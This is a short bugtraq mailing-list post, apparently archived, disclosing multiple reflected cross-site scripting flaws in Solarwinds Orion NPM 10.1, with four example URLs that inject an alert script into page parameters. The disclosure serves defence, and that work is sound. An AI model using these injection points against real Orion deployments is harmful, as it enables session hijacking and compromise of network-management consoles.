Multiple XSS in Solarwinds Orion NPM 10.1

From: John Blakley <john.blakley@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: Multiple XSS in Solarwinds Orion NPM 10.1
Date:


Values placed in the URI of the browser are rendered correctly. Orion NPM
10.1 has just been released, so there is no known fix available as of yet.

Examples:

Most "variable=" that I've checked are vulnerable:

http://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-231270=0225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E

http://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%2=7test%27%29%3C/script%3E&I:100&view=InterfaceDetails

http://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28=%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=

If you need more information please let me know. Is there a template I
should fill out for these reports?

If this is published, please publish under x0skel and NOT my name....

Thanks,
John





Copyright © 1995-2018 LinuxRocket.net. All rights reserved.